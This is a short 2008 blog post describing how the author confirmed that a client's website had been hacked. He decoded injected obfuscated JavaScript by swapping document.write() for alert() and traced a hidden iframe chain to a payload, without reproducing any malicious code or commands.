javascript

Tag: javascript

Deciphering Obfuscated JavaScript

by Glen on Dec.24, 2008, Tags: javascript, php, security

I had a client who needed me to verify if a site he was hosting had indeed been hacked. The site had several obfuscated lines of JavaScript throughout most if not all of the pages of the site.

I was able to confirm the site was compromised without running the code on a VM or chancing with noscript on my machine by replacing all document.write() calls with alert().

Just as expected there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe which redirected to a payload. The same network delivering the payload had also uploaded the modified files via ftp a few days earlier.

Since I found no cracking attempts on the sites ftp account I’m thinking the client’s client machine is part of the happy botnet.

This is the first time I’ve ran into an encrypted iframe and thought it was interesting.

Leave a Comment :javascript, php, security more...

Hello. Welcome to StellarTech Blog!
Thanks for dropping by! Feel free to join the discussion by leaving comments, and stay updated by subscribing to the RSS feed.
Blog Authors
Tags
cakephp cisco cli ddos desktop developement family freebsd freelance gadgets hosting javascript linux list networking news openvpn pfsense phishing php ramblings resources router samba security site software reviews ssh streaming tutorials ubuntu video vista w2k3 windows
Now Playing
Space (I Believe In) by Pixies
from the album Trompe le Monde.
0 days ago via last.fm.
Recent Activies
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.
- Watched a video on Hulu.